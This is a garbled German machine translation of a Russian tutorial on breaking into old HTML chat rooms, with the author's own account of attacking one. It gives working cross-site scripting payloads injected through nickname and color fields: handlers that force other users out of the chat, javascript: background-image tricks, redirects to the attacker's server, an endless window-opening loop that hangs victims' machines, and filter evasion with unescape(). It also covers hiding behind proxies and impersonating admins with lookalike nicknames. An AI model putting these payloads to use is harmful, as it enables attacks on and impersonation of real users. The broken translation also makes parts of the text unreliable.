Chat-Hacking Teil 1 (Theorie und Praxis)
Diese Seite ist in keiner Weise ruft nicht für illegale Aktivitäten "krekerstvu" usw. Das Hauptziel - zu studieren Funktionen von HTML Fehler und mit ihrer Anwendung verbundenen Warnung. Für illegale Nutzung der Informationen vom Autor nicht verantwortlich ist . Über alle Bugs in Chatrooms, wurde Chats Verwaltung vom Autor informiert.
Alle Beispiele in dem Artikel wurden getestet und arbeiten in MSIE 5.50.4134.0600. Effizienz in den anderen Versionen kann ich nicht garantieren, aber ich bin sicher , dass fast alle Beispiele wird es funktionieren.
Glossar
Brechen durch einen Spitznamen (der Handler ohne die Anführungszeichen)Brechen durch einen Spitznamen (der Handler wird in Anführungszeichen eingeschlossen)
Brechen durch einen Spitznamen (der Filter lässt nicht die Anführungszeichen / relevanten Zeichen)
Brechen durch Farbe (ohne die Anführungszeichen Attribut)
Brechen durch Farbe (Attribut mit Anführungszeichen)
Welche Zeichen Filter werden sollten überprüft
Limiter - Handler
Forgery nicks, nicks leer
Allgemeine Theorie
Hier möchte ich auf Hacking Azah Chats zu konzentrieren. Pre izvenyayus zu fortgeschrittenen Leser - diese Methoden sind gut bekannt und sind so alt wie die Welt. Wenn Sie genug fortgeschritten sind, können Sie den Fokus auf das nächste Kapitel bringen.Das erste, was ich, dass jeder Chat in ihrer ursprünglichen und einzigartigen zu beachten wollen (außer Kopien von publizierten tsgishki natürlich). Da absolut keine universellen Möglichkeiten von Hacking. Fast jeder Chat-Funktionen sind zu beachten, und ohne die, stumpfe Vorlagen wird nicht funktionieren.
Vor allem, was ich meine tatsächlich von HTML-Chat zu brechen? Dies ist keine triviale Flut und Angriffe auf IP-Chat. Unter dem Einbruch meinen wir nicht autorisierte Änderungen an den Chat-HTML-Dokument oder den Zugriff auf versteckte Teile davon (zB Privat), dh eine solche Wirkung auf den Chat, die für Benutzer nicht vorgesehen und erlaubt war. Dies gilt gleichermaßen nicht nur Chatrooms und Foren, Gäste Bücher, etc. (Wo alle beschriebenen Methoden arbeiten, und noch besser, weil diese Formen geschützt sind, in der Regel schlechter als Chat-Räume).
Alle Beschreibungen gelten nur für HTML-Chats. Hacking Java-Chat-Räume - eine separate und völlig anderes Lied. Ich hoffe, dass Sie in der Lage, eine Art von einem anderen Chat zu unterscheiden 
).
Also, wir sind am Rande HTML-Chat. Nehmen wir an, dass wir es auf die "Stärke" überprüfen möchten. Was zu tun ist? Zunächst einmal über einen anonymen Proxy wir (ich hoffe, Sie wissen, was es ist) verbunden sind. Es ist aus zwei Gründen notwendig: Erstens, wir anonyme liefern (dass der Administrator Onkel schlug auf den Arsch würde), und zweitens, wenn der Administrator immer noch nicht, wie unsere Versuche, und es wird uns zum Fenster im Chat zu schließen, könnten wir wechseln deren Stellvertreter auf andere IP-Adressen und geben Sie dann den Chat. Es ist wahr, es hat eine Sache: der Eingang zu einigen Chatrooms nicht über öffentliche Proxies erlaubt.
Als nächstes müssen wir die eigentliche Waffe, die wir haben, um herauszufinden, was das heißt, welche Attribute die Benutzer angeben können. In der Regel können alle Chats NICK nick und nick COLOR eingeben. Darüber hinaus ist es manchmal möglich, den SOAP-Benutzer, seine Heimat Webseite, Sex, Chat, Bildwiederholrate einstellen und andere. Im Interesse der Praxis sind solche Felder wie Farbe, Spitznamen, Seife und Benutzer-Homepage. Sie werden direkt in den Körper des Dokuments eingefügt, weil es durch sie Chat angegriffen werden kann. Es sollte, dass die Zimmer in einigen Chat beachtet werden, sich zu registrieren und Teil Attribute bei der Registrierung und dem Teil definiert - direkt vor dem Chat (oder bereits im Chat). Logic mit Registrierung in der Regel steiler und besser geschützt aufgehäuft.
> Lassen Sie sich auf Möglichkeiten , Hacking. Vor allem auf die Form eines Code-Fragment in MDM durch die Farbe unserer Beiträge (übrigens Farbe kann separat für den Nickname angegeben werden, und für Mitteilungstext - Sie müssen beide zu überprüfen, da sie von verschiedenen Chat analysiert werden können) gegeben fokussiert werden. Warum sind wir in erster Linie daran interessiert, die Farbe? Denn Farbe ist innerhalb des Tags angegeben, in ihren Parametern, im Gegensatz zu zum Beispiel nick, die oft in der Tag - Körper erscheint. Und in den Chat wir es in den Tag - Parameter zu erhalten , müssen zu brechen , dass wir die Attribute ändern könnten oder Ihr Skript einfügen (manchmal natürlich alle Tags Sie einfach den Nachrichtentext schreiben kann, so , bis vor kurzem war es zum Beispiel chat.rambler chatten. ru, aber diese Option ist so dumm , dass solche Chats wahrscheinlich nicht existiert, und ich glaube nicht).
Wir sind daran interessiert, in welcher Form die Farbinformation an den Server gesendet wird. Die am wenigsten geschützten String-Typ, wenn die Farbe in Form richtigen seinem Namen übertragen wird. Zum Beispiel:
<select name=youcolor style="width: 70px">
<option value=blue>синий value=blue
<option value=red>красный
<option value=darkred>т-красный
<option value=green>зеленый
<option value=black>черный value=black
<option value=lightblue>голубой value=lightblue
</select> Dieser Chat ist bricht in der Regel in einem Grad oder einem anderen . Über den schlimmsten Fall, wenn die Farbe als Zahlencode zurückgegeben wird:
<select name=youcolor style="width: 70px">
<option value=#0000FF>синий value=#0000FF
<option value=#AF0000>красный
<option value=#FF0000>т-красный
<option value=green>зеленый
<option value=#000000>черный value=#000000
<option value=#0000AF>голубой value=#0000AF
</select> In diesem Chat, vielleicht sind die Filter für alle Symbole , ausgenommen Zahlen, Zeichen # und den Buchstaben A, B, C, D, E und F. Dann werden etwa durch die Farbe brechen wird vergessen haben.
Schließlich der schlimmste Fall, wenn die Farbe in Form einer Nummer aus der Liste der zulässigen Farben übertragen wird:
<select name=youcolor style="width:70px">
<option value=1>синий <
<option value=2>красный <
<option value=3>т-красный <
<option value=4>зеленый <
<option value=5>черный <
<option value=6>голубой <
</select> Typischerweise kann ein solcher Riss nicht plaudern durch Farbe (und oft unmöglich). Dies ist die sicherste Option (übrigens, die Entwickler empfehlen Chats).
Als nächstes müssen wir den HTML-Code zu ändern, so dass wir frei Attributwerte zu beliebigen Server senden können. Um dies zu tun, halten Sie die Website unter auf dem Laufwerk und ändern Sie das Anmeldeformular im Chat (oder Registrierung) seduyuschim Weg: die relative URL - Parameter Aktion ändern , um eine vollständige Adresse zu bilden. Ersetzen Sie alle versteckten Typ - Tags Text eingeben können , und ihre Tags , um die Select - Eingang zu ändern. müssen auch Beschränkungen für die Länge des Eingangswerts (falls vorhanden) zu entfernen. Zum Beispiel hatte, wenn die ursprüngliche Form die folgende Form:
<form name="logon" method="POST" action="/cgi-bin/chat/chat.cgi">
<table cellspacing="0" cellpadding="0">
<tr>
<td valign="middle">
<small>Nickname:</small>
<input type="text" name="username" size="12" maxlength="12" >
</td>
<td valign="middle"><small> TextColor:</small>
<select name="color">
<option selected value="black">black
<option selected value="red">red
<option selected value="blue">blue
</select>
</td>
<td valign="middle">
<small>
<input type=submit value="Join Chat">
</small>
</td>
<input type=hidden name=message value="logged on.">
<input type=hidden name="logon" value="">
<input type=hidden name=to value="Room">
<input type=hidden name=frames value="yes">
</td>
</tr>
</table>
</form>
So, nachdem wir die entsprechenden Substitutionen erhalten:
<form name="logon" method="POST" action="http://typachat.ru/cgi-bin/chat/chat.cgi">
<table cellspacing="0" cellpadding="0">
<tr>
<td valign="middle"><small>Nickname:</small>
<input type="text" name="username" >
</td>
<td valign="middle"><small> Text Color:</small>
<input name="color">
<option selected value="black">black
<option selected value="red">red
<option selected value="blue">blue
</select>
</td>
<td valign="middle">
<small>
<input type=submit value="Join Chat">
</small>
</td>
<input type=text name=message value="logged on.">
<input type=text name="logon" value="">
<input type=text name=to value="Room">
<input type=text name=frames value="yes">
</td>
</tr>
</table>
</form>
Beachten Sie, dass das Dokument dynamisch vom Typ document.write () Funktion erstellt werden kann, dann höchstwahrscheinlich, Sie haben es zu einer statischen Sicht zu konvertieren. Darüber hinaus kommt es oft vor, dass die HTML-Datei auf der Festplatte nach der Lagerung, nicht in den Chat zu öffnen will. Dies kann auf die Tatsache zurückzuführen sein, dass die Seite nicht vollständig gespeichert wurde, wenn es von Rahmen bestand. In diesem Fall müssen Sie mehr gründlich, um die Seitenstruktur verstehen und rechts halten. Ein weiterer Grund kann sein , dass der Server Titel referer http - Request Spur des Feldes hält, und genau feststellen , was wir nicht auf seine Seite ging. In diesem Fall müssen Sie andere Methoden zu verwenden, die im Kapitel "Hacking at http" diskutiert werden.
Wir experimentieren jetzt mit Chat. Zunächst einmal müssen Sie herausfinden, welche Filter auf die Eingangswerte sind (zunächst für die Farbe und Spitzname). Wir sind in erster Linie Interesse an folgenden Zeichen:
| " | ' | ` | = | < | > | ; | \ | & | % | Lücke |
Geben Sie sie in das Farbfeld und Nick gehen in den Chat-Raum (wenn wir auf solche Attribute erlaubt werden, wenn nicht leer ist, müssen Sie die Zeichen sortieren, eins nach dem anderen), und sehen, welche Charaktere waren übersprungenen Filter (Schreiben im Chat, dass der Thread-Typ "Hallo", und posmortev in den HTML-Textzeichen, welche Farben und Spitznamen sind vorhanden). Einige Chats nur die gefilterten Symbole entfernt, einige ersetzen sie durch andere Charaktere, und ein Teil wird in eine codierte Form wie <oder 'umgewandelt. Die konvertierte Zeichen passen uns nicht, weil HTML sie nicht wahrnehmen (aber mehr dazu finden Sie unter "Vor ein paar Hacks Chat T Leiden").
Als Ergebnis sollten wir für jedes Attribut des Anmeldeformulars eine Liste der Sprung Zeichen lang sein.
Weiterhin ist es unser Ziel innerhalb jeden Tag zu bekommen für, dass sein pramatry Ihr Skript dort ändern würde oder einfügen. Es gibt zwei grundsätzlich verschiedene Möglichkeiten , dies zu tun: Die erste ist , dass wir der richtige Code haben wird durch die Attribute übertragen , die bereits innerhalb des Tags sind (dh zwischen den spitzen Klammern) - beispielsweise durch Farbe oder Adresse Seife. Die zweite ist, dass die Struktur der HTML-Code brechen würde, so dass wir der richtige Code war innerhalb des Tags haben. Wie zu tun, wird es aus der Analyse der spezifischen Struktur des Kurtschatow-Code und ungefiltert Satz von Zeichen für unsere Attribute bestimmt. Verschiedene Ausführungsformen betrachten, in den nachfolgenden Beispielen wird die Rissbildung. In der Zwischenzeit würde Ich mag einige der HTML-Funktionen hervorzuheben, die eigentlich interessante "Effekte" zu ermöglichen.
Funktionen HTML
P> Hier werde ich nicht einen Vortrag über HTML für Dummies zu geben. Ich hoffe, dass Sie wissen, was ein Tag und seine Parameter sind vertraut mit JavaScript und schrieb mindestens eine Web-Seite in seinem Leben auf der HTML (anstelle von Frontpage).Die größte Mühe (und mit ihr die Kraft) HTML, dass es nicht einen einzigen Standard verfügt. Das heißt, es ist, wie es ist, aber die Standards sind so heterogen, und es gibt so viele in HTML verflochten, dass niemand weiß, gründlich (und oft nicht weiß, was es ist). Neben den Wettbewerb zwischen Browsern und Websites Promiskuität führt zu der Tatsache, dass Browser die größtmögliche Anzahl von Standards und Technologie zu halten versuchen. Darüber hinaus hat das Fehlen gemeinsamer Standards führte zu der Tatsache, dass Web-Meister auch auf der gleichen Seite eingestreuten verwalten in verschiedenen Stilen zu schreiben :. On (Allerdings erlaubt diese Hacker in das HTML zu brechen, und eine Menge Kopfschmerzen für Entwickler liefert.
Eine einfache Frage: Was sind die Trennzeichen in HTML und JavaScript? Auch kann ich nicht sofort und eindeutig zu diesem Thema beantworten. Betrachten Sie das folgende Beispiel:
<font onclick= "alert()">Text</font> Hier ist alles klar und offensichtlich. Es ist ein Tag, der einen Click - Ereignishandler hat, geschrieben in JavaScript, dessen Text in Anführungszeichen gesetzt. Was ist JavaScript ispolzute explizit angegeben werden können:
<font onclick="javascript:alert()">Text</font> Delimiter Linie in diesen Beispielen sind die doppelten Anführungszeichen. Sie können jedoch ohne sie auskommen. Denn nach Onclick = kann nur statische Line-Handler, erlaubt HTML Anführungszeichen weglassen (dies gilt für viele Fälle , in denen das Argument nur einen String-Konstante sein kann). Somit ist dieses Design funktioniert auch:
<font onclick=alert()>Text</font> und jetzt, statt einer leeren Nachricht einfügen, etwas Sinnvolles:
<font onclick=alert('Привет друзья!')>Text</font> den Link Demonstration Öffnen zeigt, dass dieses Beispiel nicht funktioniert. Der Grund ist folgender: der Körper des Handler kann nicht in Anführungszeichen gesetzt werden, aber in diesem Fall wird die erste Zeile als Raum-End-Prozessor zu sein (auch wenn die Lücke innerhalb der Anführungszeichen ist). Daher ist die Browser - Prozedur nur ein Fragment von alert ( 'Hallo, und ungedeckten Zitat zu finden gibt eine Fehlermeldung Warum der Browser nicht auf die Tatsache reagiert , dass der Raum innerhalb der Anführungszeichen ist glaube ich der Grund dafür ist , dass es zwei Sprachen gemischt.? HTML und JavaScript. Browser "sah" , dass nach dem Zeichen = keine Anführungszeichen und damit für eine Lücke sah - .. als das Ende der Prozedur innerhalb des Handlers , wie es im Moment nicht interessiert, weil es nicht zu HTML bezieht, und ein JavaScript damit Zitat Öffnen er einfach nicht bemerkt, und nahm ich einen Raum über das Ende der Einstellung nächste Design-Arbeit ohne Fehler.:
<font onclick="alert('Привет друзья!')">Text</font>
<font onclick=alert('Привет_друзья!')>Text</font>
<font onclick="alert('Привет друзья!')"onmouseover='alert()'>Text</font>
<font color=alert('Привет друзья!')>Text</font>
Hinweis wichtiges Merkmal: Wenn der Tag-Parameterwert in Anführungszeichen, so kann der Raum vor der nächsten Option weggelassen werden (die dritte Zeile des Beispiels). Beispiel funktioniert auch vierte Zeile (in dem Sinne , dass der Browser schwören nicht, aber das Skript sicherlich nicht funktioniert), da der Browser betrachten nicht den Inhalt des Attributs Farbe JavaScript-Ohm, und daher nicht an unbedeckten Zitat nicht schwören, obwohl , wie der Farbwert nur ein Fragment von Alarm genommen wird ( ' hallo (als eine Farbe in HTML kann als eine beliebige Zeichenfolge handeln, in diesem Fall wandelt der Browser die Zeichenfolge zu einem gewissen numerischen Wert und glaubt , dass Farbe).
Gibt es noch andere Zeichen - der Handler stoppt ohne die Anführungszeichen (außer Raum und Charakter>) - eine offene Frage. Ich weiß nicht, von, aber ich nehme an, dass sie sein können.
Wie aus diesen Beispielen ersichtlich ist, können Begrenzer Linien doppelte und einfache Anführungszeichen sein. Dies gilt gleichermaßen für HTML und JavaScript ein, jedoch gibt es mindestens ein Symbol, das die Grenzlinien in HTML (aber nicht JavaScript!). Es `Backquote ( in der Regel auf der gleichen Taste mit dem Buchstaben E befindet). Es kann in dem folgenden Beispiel zu sehen ist:
<font onclick=`alert('Привет друзья!')`>Text</font> Ich schwöre, dass mindestens 90% der Webmaster über weiß es nicht! Wie auch immer, ich habe nicht gesehen, was würde jemand einen Reverse-Apostroph angewendet. Dieser Charakter - ein Geschenk des Himmels für einen Hacker ).
Oft kommt es vor, dass Sie Anführungszeichen innerhalb des einen verwenden müssen - das andere. Und es ist schwierig, vor allem, wenn der Chat geht nur eine Art von Anführungszeichen. Aber es stellt sich JavaScript ermöglicht es Ihnen, String-Konstanten in andere String-Konstanten einbetten, und zugleich mit ein und demselben Anführungszeichen sind E! Zum Beispiel:
'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')' Das Beispiel verwendet die eingebettete einfache Anführungszeichen, aber der Interpreter meldet keinen Fehler. Beachten Sie, dass der Inhalt der internen Anführungszeichen sind nicht willkürlich: es darf keine Leerzeichen enthalten, und am Ende werden einige Zeichen nicht erlaubt, zum Beispiel; oder).
Nun lassen Sie uns über Links reden. Das erste, was dieses Detail zu beachten: die Entwicklung des Internet geschehen, so dass es ganz andere Technologie vermischt. Der Zugang zu Informationen kann durch eine große Anzahl verschiedener Protokolle nehmen. So können Sie jede der bekannten Protokolle Browser angeben, wenn Sie den vollständigen Pfad des Dokuments (URL) angeben. Es ist bemerkenswert, dass Javascript auch die Protokolle zugeschrieben wird (obwohl das nicht der Fall, aber es scheint, haben die Entwickler gedacht, es wäre zu fett sein, das Konzept der getrennten Skripten zu markieren, und rangiert sie an die Minuten). Deshalb , wo im HTML - Dokument, können Sie eine URL angeben können, können Sie das Skript einfügen. Und dieses Skript wird ausgeführt, wenn der Benutzer (oder der Browser selbst) den angegebenen Link anfordern. Zum Beispiel:
<a href=javascript:alert()>Text</a> Interessanterweise zusätzlich zu den Betreibern, in Bezug auf die JavaScript, können Sie einfach geben Sie die Zeichenfolge (oder numerischen) Wert (aber sicherlich nach dem Operator, falls vorhanden). Mit einem Klick auf den Browser auf diesen Link wird führen Sie zuerst vor den Betreibern zu erreichen, und dann ein neues Dokument öffnen , und setzen Sie den Wert des letztgenannten in der Verbindungsleitung:
<a href=javascript:alert();'Hello!!'>Text</a> Ich stelle fest , dass die Tags so eine neue Seite einzufügen , ist unmöglich. Hacking-Chat R
Hier ist ein Beispiel für eine der ersten Gespräche, die ich kompromittiert. Dieser Chat war sehr einfach, und wir brechen auf, was der erste Ansatz genannt wird ).
Und jetzt gibt es nur wenige Gespräche, in denen sie stattfindet. Obwohl ich mich dieser Methoden gedacht, aber dann fand ich sie in Hacker-Zeitschriften.
Eingabeformular dieser Chat ist genau im Einklang mit der Form, in der "Allgemeinen Theorie" dargelegt. Nach der Konvertierung und speichern Sie das Formular auf der Festplatte, ich überprüft, welche Zeichen in der Farbe Attribut sind. Es stellte sich heraus, dass diese Symbole sind (von denen, die wir interessiert sind, finden Sie in Kapitel "Allgemeine Theorie".):
| ' | ` | = | ; | % | Lücke |
Und natürlich waren alle Zahlen und Buchstaben. Die Länge der Zeichenfolge-Werte der Farben sind nicht beschränkt. Dann sah ich, wo es in der Mitteilung Rahmenfarbe eingesetzt wird. Hier ist ein Fragment des Rahmens:
<font color=Black><b>Путник</b>- Alpha, привет ))</font>
<font color=Red><b>Alpha</b>- Всемприветик !!</font> Wie Sie sehen können, eingefügt die Farbe ohne Anführungszeichen umgeben. Das passt zu mir. Ich angemeldet unter dem Namen Shram (oder fast unter dem gleichen Namen;)) und rot size = 20 Farbe. Meine Botschaft war wie folgt:
<font color=red size=20><b>Algol</b>- Hi</font> Es zeigt eine sehr große Schrift, die einen kleinen Plausch Bevölkerung überrascht ).
Somit ist trotz der Tatsache , dass wir nicht neposredstveno Tags einfügen können , aber erlauben Eintrag in Farbe Attributraum erlaubt uns Parameter nicht autorisierte Tag definieren. Aber für mich war dies sicherlich nicht genug. Schriftgröße ändern sicherlich cool, aber wirklich etwas Nützliches kann nur mithilfe von Skripts erfolgen. direkt script - Tag einfügen, konnte ich nicht (oder besser gesagt, zu diesem Zeitpunkt wusste ich nicht , wie es zu tun). Aber ich konnte einen Handler für jedes Event - Tag fragen. Das ist, was ich für die Farbe gefragt, die aus dem Chat, was irgendeinen Idioten entfernen würde: #A0A000 onmouseover=parent.frames[2].forms[0].ExitChat.click() size=30. Und dann schickte er eine lange lange Nachricht in privat. Beiträge Farbe nahm ich so hoch, dass sie nicht von der Hintergrundfarbe unterscheiden würde. Eine Schriftgröße und die Länge der Nachrichten waren so groß , dass das Opfer ging wahrscheinlich einmal nach der Maus, was in meinem Handler Onmouseover die Taste gedrückt "Chat off" anstelle des Benutzers ).
Doch nach und nach gab es Experten, die sich durch einen Trick sah und absichtlich fuhr über ein Chat-Fenster. Mein Skript funktioniert nicht immer 
(. Zuerst dachte ich, es keine Möglichkeit gab. Weil ich nur als Event-Handler das Skript einbetten können, dann, wenn das Ereignis nicht eintritt, und das Skript nicht funktioniert. Aber das Graben in den "Annals", fand ich eine Lösung (derzeit ist es trivial geworden und gut bekannt). es stellte sich heraus , dass der Stil - Attribut, können Sie die URL des Hintergrundbildes für den Tag enthalten. und wo Sie eine URL angeben können, kann es geschrieben werden und das Skript. und die Hauptsache ist , dass das Hintergrundbild selbst geladen, nachdem ein HTML - Dokument geladen! Wenn ich wollte Alert-Chat-Show Teilnehmer, melde ich mich mit den folgenden Farben:
style=background-image:url(javascript:alert('приветик_всем_!!')); Es sollte ein wichtiges Detail zu beachten: die Struktur der meisten HTML-Chat ist, dass die Seite regelmäßig aktualisiert wird, so das Skript ausgeführt wird, als einmal gesendet, aber viele, bis unsere Botschaft nicht vom Bildschirm verschwinden.
Aber wie es nun die Farbe Attributwert sah den Chat zu verwerfen:
style=background-image:url(javascript:parent.frames[2].forms[0].ExitChat.click()); Wir dürfen nicht vergessen, dass das Skript an private gesendet, werden Sie sehen nicht nur Ihre "Begleiter", aber Sie tun, so sollten Sie wissen, wie sie sich von dem Skript von den Auswirkungen zu schützen. Dies kann auf zwei Arten erfolgen: entweder sich zu setzen, zu ignorieren (und wir werden nicht ihre eigenen Nachrichten zu sehen) oder den Einstellungen Ihres Browsers um die Anzeige der Bilder zu untersagen. Dann wird das Skript ausgelöst über ein Hintergrundbild wird nicht funktionieren.
Jetzt möchte ich nekotrye nützliche Skripte zu zeigen, dass in geknackt Chats verwendet werden können:
Javascript: Ebene ( 'http://myserver.ru') ; - Lädt im aktuellen Frame (oder Seite) Website myserver.ru.Einige Chat - Räume, wenn ein Fragment http: // diesen Link finden und automatisch <a> Tag eingefügt. Denn es wird unser Skript zerstören, dann sollte dies nicht zugelassen werden. Um dies zu tun, lassen Sie einfach das Präfix http: (welche bereits die Standardeinstellung). Dann wird das Skript wie folgt aussehen: Javascript: Ebene ( '// myserver.ru' ); .Dva Geht voran Slash - erforderlich sind.
javascript: parent.frames [2] .document.location = 'http: //myserver.ru' - Lasten in einem der Frames Website myserver.ru.
javascript: for (;;) open ( ) - eine unendliche Anzahl von Fenstern öffnet sich (wenn Sie nicht rechtzeitig orientieren, führt zu einem Hang der Maschine und dann neu starten).
javascript: document.write ( '<script> alert () </ script>') - ersetzt den aktuellen Rahmen des Skripts, die dann ausgeführt wird. Hinweis: Wenn Chutney Symbole überspringt <und> (was die überwiegende Anzahl der Chats ist) ist ein Skript, das wir nicht einfügen können. Aber es gibt einen Ausweg. Diese Anwendung unescape () Funktion, die den ASCII-Zeichencode in das Zeichen umwandelt. Ersetzen Sie die spitzen Klammern der unescape () Funktion und einem entsprechenden Code, dann wird das Skript wird:
javascript:document.write(unescape('%3C')+'script'+unescape('%3E')+'alert()'+unescape('%3C')+'/script'+unescape('%3E')) 3C') + 'script' + unescape ( '% 3E') + 'alert ()' + unescape ( '% 3C') + '/ script' + unescape ( '% 3E javascript:document.write(unescape('%3C')+'script'+unescape('%3E')+'alert()'+unescape('%3C')+'/script'+unescape('%3E')) javascript:this.insertBefore(e=document.createElement('IMG'));e.src='demo.jpg' - Einsätze Bild nach dem Text. Beachten Sie, dass in IE 5.x Sie einen beliebigen Tag einfügen können außer für FRAME, IFRAME und SELECT. Aber in IE 4.x createelement () Funktion ermöglicht das Einfügen von nur Tag IMG, Fläche und OPTION. Informationen über Netscape haben nicht, Sie selbst experimentieren können.
'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')' event.returnValue = alert (st) * 'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')' / * blockieren die Pull-Down - Menü auf der Seite, und deshalb tut nicht verfügbar Ansicht von HTML - Inhalt in den Rahmen. Dies macht es möglich, ihre Manipulation des Körpers des Chat zu verbergen ). * / Manchmal ist es nützlich Protokolle unter einem anderen Spitznamen. Chats mit dem System der Registrierung der Benutzer nicht lassen Sie es tun, wenn Sie das Passwort nicht kennen (und Sie haben, wissen wahrscheinlich noch nie). Banal Ausgabe: Registrierung mit dem Spitznamen, wo das lateinische Alphabet ein sehr ähnliches Schreiben der russischen Layout zamenyatesya. Zum Beispiel Logins unter dem Namen Admin wo lateinischen Buchstaben und auch durch russische ersetzt.
primitive Methode, aber es funktioniert)). Es gibt auch mehr schwere Fälle. Zum Beispiel wird in einigen Chatrooms verboten ein Spitznamen Zeichen aus verschiedenen Layouts zu verwenden. Dann forschenden Geist gibt es nichts anderes übrig, als um Hilfe zu Onkel Tore machen. Und hier ist es die menschliche Güte, hat Microsoft nicht über die bösen Benutzer vergessen und gab uns ein Symbol (Aka aka% AD), die selbst Microsoft "weiche Bindestrich" ( "kurze Striche" bezeichnet). Es sieht wirklich wie in Word Bindestriche und in Excel, auch, und sogar in einem Notebook, aber nicht in IE! Für maykrosoftovskih eskplorera Symbol einfach nicht vorhanden ist , das heißt, er es zu sein scheint, aber er vergaß eine grafische Darstellung zu machen. Es ist einfach nur nicht in der HTML-Seite gezogen! So das Hinzufügen eines kurzen Strichen zu jedem nick und wenn sie bei ihm anmelden, erhalten wir in einen Chat mit einem Spitznamen, ohne Bindestrich wie ein Spitzname in der HTML-Seite angezeigt. Und Sie können noch steiler tun - Login unter dem Namen, nur die Zeichen-Strich-sotoyaschim. Dann werden alle Ihren Namen nicht im Chat erscheinen, absolut leeren Raum)). (Hinweis: Tinker Yeshe Bit-Symbol-Strich-, fand ich immer noch Fälle, in denen es angezeigt wird: Es erscheint nur als Bindestrich Das heißt, wenn innerhalb eines Wortes wert ist ein kurzer Strich, und wenn das Wort am Ende Linie steht, die einen Teil des Wortes nach dem Bindestrich kann. übertragen werden, um die nächste Zeile und der Bindestrich sichtbar ist, ist es möglich, unsichtbar Bindestrich - eine bewusste Funktion von Microsoft (die übrigens nicht schmälern ihre Nützlichkeit in Hacking ). Die Wahrheit ist nicht klar, warum er immer noch immer sichtbar in anderen Anwendungen?)
Kommentare
im Auge kommentierte halten , dass der Inhalt und der Ton Ihrer Nachrichten , die Gefühle von echten Menschen verletzen können, Respekt und Toleranz gegenüber seinen Gesprächspartnern, auch wenn Sie Ihr Verhalten in Bezug auf die Meinungsfreiheit und die Anonymität des Internets, ändert ihre Meinung nicht teilen, nicht nur virtuell, sondern realen Welt. Alle Kommentare werden aus dem Index, Spam - Kontrolle versteckt.